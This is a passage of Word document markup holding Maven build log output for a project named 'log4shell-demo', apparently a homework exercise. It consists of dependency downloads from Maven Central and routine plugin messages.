    <w:p w14:paraId="4CBD59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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.0.6/maven-plugin-api-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1719DE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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.0.6/maven-plugin-api-2.0.6.pom (1.5 kB at 54 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567EE03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https://repo.maven.apache.org/maven2/org/apache/maven/maven/2.0.6/maven-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6D79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https://repo.maven.apache.org/maven2/org/apache/maven/maven/2.0.6/maven-2.0.6.pom (9.0 kB at 393 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE947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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/5/maven-parent-5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066B3A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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/5/maven-parent-5.pom (15 kB at 525 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA49D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https://repo.maven.apache.org/maven2/org/apache/apache/3/apache-3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782BE1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https://repo.maven.apache.org/maven2/org/apache/apache/3/apache-3.pom (3.4 kB at 143 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46839E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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0/plexus-utils-3.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4254BF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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0/plexus-utils-3.0.pom (4.1 kB at 177 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4855E2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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.0.6/maven-plugin-api-2.0.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CD7C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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0/plexus-utils-3.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631B6BE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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.0.6/maven-plugin-api-2.0.6.jar (13 kB at 429 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E06B36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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0/plexus-utils-3.0.jar (226 kB at 1.7 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521DBC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Deleting /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C52B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C2483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maven-resources-plugin:2.6:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD030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https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.0.6/maven-project-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E7FE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https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.0.6/maven-project-2.0.6.pom (2.6 kB at 98 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F20B0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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.0.6/maven-settings-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141A06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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.0.6/maven-settings-2.0.6.pom (2.0 kB at 69 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458575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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.0.6/maven-model-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF47C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.0.6/maven-model-2.0.6.pom (3.0 kB at 102 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5457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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.4.1/plexus-utils-1.4.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BDEB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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.4.1/plexus-utils-1.4.1.pom (1.9 kB at 80 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0FB75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https://repo.maven.apache.org/maven2/junit/junit/3.8.1/junit-3.8.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FA38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https://repo.maven.apache.org/maven2/junit/junit/3.8.1/junit-3.8.1.pom (998 B at 43 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175015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https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.0.6/maven-profile-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7642B8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https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.0.6/maven-profile-2.0.6.pom (2.0 kB at 52 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AA31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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.0.6/maven-artifact-manager-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3438BC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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.0.6/maven-artifact-manager-2.0.6.pom (2.6 kB at 85 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB0208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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.0.6/maven-repository-metadata-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DD826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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.0.6/maven-repository-metadata-2.0.6.pom (1.9 kB at 71 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E0D1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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.0.6/maven-artifact-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C5C62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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.0.6/maven-artifact-2.0.6.pom (1.6 kB at 63 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534F83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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.0.6/maven-plugin-registry-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C872E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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.0.6/maven-plugin-registry-2.0.6.pom (1.9 kB at 72 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5919F55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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.0.6/maven-core-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E5BF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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.0.6/maven-core-2.0.6.pom (6.7 kB at 280 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFC1A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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.0.6/maven-plugin-parameter-documenter-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758ACFD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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.0.6/maven-plugin-parameter-documenter-2.0.6.pom (1.9 kB at 80 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69548E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https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/2.0.6/maven-reporting-api-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF24A6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https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/2.0.6/maven-reporting-api-2.0.6.pom (1.8 kB at 67 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491D3D2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https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting/2.0.6/maven-reporting-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C055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https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting/2.0.6/maven-reporting-2.0.6.pom (1.4 kB at 63 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AABD9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https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.0-alpha-7/doxia-sink-api-1.0-alpha-7.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBC582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https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.0-alpha-7/doxia-sink-api-1.0-alpha-7.pom (424 B at 12 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8DF6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https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia/1.0-alpha-7/doxia-1.0-alpha-7.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2A16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https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia/1.0-alpha-7/doxia-1.0-alpha-7.pom (3.9 kB at 196 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB8C90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https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.0.6/maven-error-diagnostics-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B03F6B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https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.0.6/maven-error-diagnostics-2.0.6.pom (1.7 kB at 61 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321DA6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https://repo.maven.apache.org/maven2/commons-cli/commons-cli/1.0/commons-cli-1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368A31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https://repo.maven.apache.org/maven2/commons-cli/commons-cli/1.0/commons-cli-1.0.pom (2.1 kB at 88 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA57E7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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.0.6/maven-plugin-descriptor-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF21B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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.0.6/maven-plugin-descriptor-2.0.6.pom (2.0 kB at 88 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2685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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interactivity-api/1.0-alpha-4/plexus-interactivity-api-1.0-alpha-4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD6AC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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interactivity-api/1.0-alpha-4/plexus-interactivity-api-1.0-alpha-4.pom (7.1 kB at 355 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329B1C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.0.6/maven-monitor-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03994B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https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.0.6/maven-monitor-2.0.6.pom (1.3 kB at 60 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF446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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-filtering/1.1/maven-filtering-1.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783034C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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-filtering/1.1/maven-filtering-1.1.pom (5.8 kB at 145 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6621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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/17/maven-shared-components-17.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2530FE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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/17/maven-shared-components-17.pom (8.7 kB at 281 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639DA0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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.12/plexus-interpolation-1.12.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312C909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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.12/plexus-interpolation-1.12.pom (889 B at 37 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B486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https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-build-api/0.0.4/plexus-build-api-0.0.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499D1B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https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-build-api/0.0.4/plexus-build-api-0.0.4.pom (2.9 kB at 84 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4782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https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/10/spice-parent-10.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7162FD9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https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/10/spice-parent-10.pom (3.0 kB at 137 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA859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https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/3/forge-parent-3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7CCD3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https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/3/forge-parent-3.pom (5.0 kB at 210 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D9D6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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.13/plexus-interpolation-1.13.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441820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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.13/plexus-interpolation-1.13.pom (890 B at 42 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB3756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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.1.15/plexus-components-1.1.15.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAC5D7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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.1.15/plexus-components-1.1.15.pom (2.8 kB at 119 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8B79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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.3/plexus-2.0.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C1DF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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.3/plexus-2.0.3.pom (15 kB at 773 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B55D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https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.0.6/maven-project-2.0.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCA1C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.0.6/maven-profile-2.0.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BA3B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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.0.6/maven-artifact-manager-2.0.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E80584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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.0.6/maven-plugin-registry-2.0.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC754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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.0.6/maven-core-2.0.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2604F2B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https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.0.6/maven-profile-2.0.6.jar (35 kB at 904 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DFD9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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.0.6/maven-plugin-parameter-documenter-2.0.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7495C21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https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.0.6/maven-project-2.0.6.jar (116 kB at 2.4 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304524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https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/2.0.6/maven-reporting-api-2.0.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679B40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https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/2.0.6/maven-reporting-api-2.0.6.jar (9.9 kB at 262 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A18A6C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https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.0-alpha-7/doxia-sink-api-1.0-alpha-7.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC26E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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.0.6/maven-plugin-parameter-documenter-2.0.6.jar (21 kB at 532 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7425EC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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.0.6/maven-repository-metadata-2.0.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE782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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.0.6/maven-artifact-manager-2.0.6.jar (57 kB at 774 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658E959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https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.0.6/maven-error-diagnostics-2.0.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0DF6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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.0.6/maven-plugin-registry-2.0.6.jar (29 kB at 340 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C230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https://repo.maven.apache.org/maven2/commons-cli/commons-cli/1.0/commons-cli-1.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BB30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https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.0-alpha-7/doxia-sink-api-1.0-alpha-7.jar (5.9 kB at 97 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20474C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.0.6/maven-plugin-descriptor-2.0.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A56E99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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.0.6/maven-repository-metadata-2.0.6.jar (24 kB at 395 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234C08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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interactivity-api/1.0-alpha-4/plexus-interactivity-api-1.0-alpha-4.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FEE8A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https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.0.6/maven-error-diagnostics-2.0.6.jar (14 kB at 192 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C301A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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.0.6/maven-artifact-2.0.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C83AC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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.0.6/maven-core-2.0.6.jar (152 kB at 1.8 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327B0CD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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.0.6/maven-settings-2.0.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A8913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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interactivity-api/1.0-alpha-4/plexus-interactivity-api-1.0-alpha-4.jar (13 kB at 162 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED891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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.0.6/maven-model-2.0.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75595C6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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.0.6/maven-plugin-descriptor-2.0.6.jar (37 kB at 380 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003A00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https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.0.6/maven-monitor-2.0.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3EAE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https://repo.maven.apache.org/maven2/commons-cli/commons-cli/1.0/commons-cli-1.0.jar (30 kB at 304 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAB6ED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https://repo.maven.apache.org/maven2/junit/junit/3.8.1/junit-3.8.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC865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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.0.6/maven-settings-2.0.6.jar (49 kB at 435 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FA3E6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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.0.5/plexus-utils-2.0.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3926C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.0.6/maven-monitor-2.0.6.jar (10 kB at 82 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E91519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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-filtering/1.1/maven-filtering-1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F421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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.0.6/maven-artifact-2.0.6.jar (87 kB at 693 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC8C4B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https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-build-api/0.0.4/plexus-build-api-0.0.4.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302FB0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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.0.6/maven-model-2.0.6.jar (86 kB at 665 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30958F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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.13/plexus-interpolation-1.13.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BB9A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https://repo.maven.apache.org/maven2/junit/junit/3.8.1/junit-3.8.1.jar (121 kB at 818 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C13820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https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-build-api/0.0.4/plexus-build-api-0.0.4.jar (6.8 kB at 45 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736F40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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-filtering/1.1/maven-filtering-1.1.jar (43 kB at 275 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E15A3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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.13/plexus-interpolation-1.13.jar (61 kB at 379 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F220A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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.0.5/plexus-utils-2.0.5.jar (223 kB at 1.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EF50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[WARNING] Using platform encoding (UTF-8 actually) to copy filtered resources, i.e. build is platform dependent!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E49B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1730671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6EE87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maven-compiler-plugin:3.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CEAE1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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.0.9/maven-plugin-api-2.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFAE4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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.0.9/maven-plugin-api-2.0.9.pom (1.5 kB at 57 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A23C6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https://repo.maven.apache.org/maven2/org/apache/maven/maven/2.0.9/maven-2.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197558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https://repo.maven.apache.org/maven2/org/apache/maven/maven/2.0.9/maven-2.0.9.pom (19 kB at 610 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D4D9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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/8/maven-parent-8.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AE76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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/8/maven-parent-8.pom (24 kB at 1.0 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0A5A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https://repo.maven.apache.org/maven2/org/apache/apache/4/apache-4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413AFF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https://repo.maven.apache.org/maven2/org/apache/apache/4/apache-4.pom (4.5 kB at 225 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6F7D2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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.0.9/maven-artifact-2.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4321B4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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.0.9/maven-artifact-2.0.9.pom (1.6 kB at 70 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2903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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.1/plexus-utils-1.5.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637D40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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.1/plexus-utils-1.5.1.pom (2.3 kB at 85 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572A23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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.0.9/maven-core-2.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069A009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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.0.9/maven-core-2.0.9.pom (7.8 kB at 354 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1682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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.0.9/maven-settings-2.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439CC8D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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.0.9/maven-settings-2.0.9.pom (2.1 kB at 94 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D21F8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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.0.9/maven-model-2.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48111B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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.0.9/maven-model-2.0.9.pom (3.1 kB at 126 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534E19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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.0.9/maven-plugin-parameter-documenter-2.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763F80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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.0.9/maven-plugin-parameter-documenter-2.0.9.pom (2.0 kB at 79 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1F176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https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.0.9/maven-profile-2.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD1D7A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https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.0.9/maven-profile-2.0.9.pom (2.0 kB at 93 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094B31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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.0.9/maven-repository-metadata-2.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A3DF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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.0.9/maven-repository-metadata-2.0.9.pom (1.9 kB at 91 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC455E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https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.0.9/maven-error-diagnostics-2.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301F65E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https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.0.9/maven-error-diagnostics-2.0.9.pom (1.7 kB at 54 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F959F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https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.0.9/maven-project-2.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0CDF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https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.0.9/maven-project-2.0.9.pom (2.7 kB at 104 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE926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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.0.9/maven-artifact-manager-2.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6C38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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.0.9/maven-artifact-manager-2.0.9.pom (2.7 kB at 129 kB/s)</w:t>
      </w:r>
    </w:p>
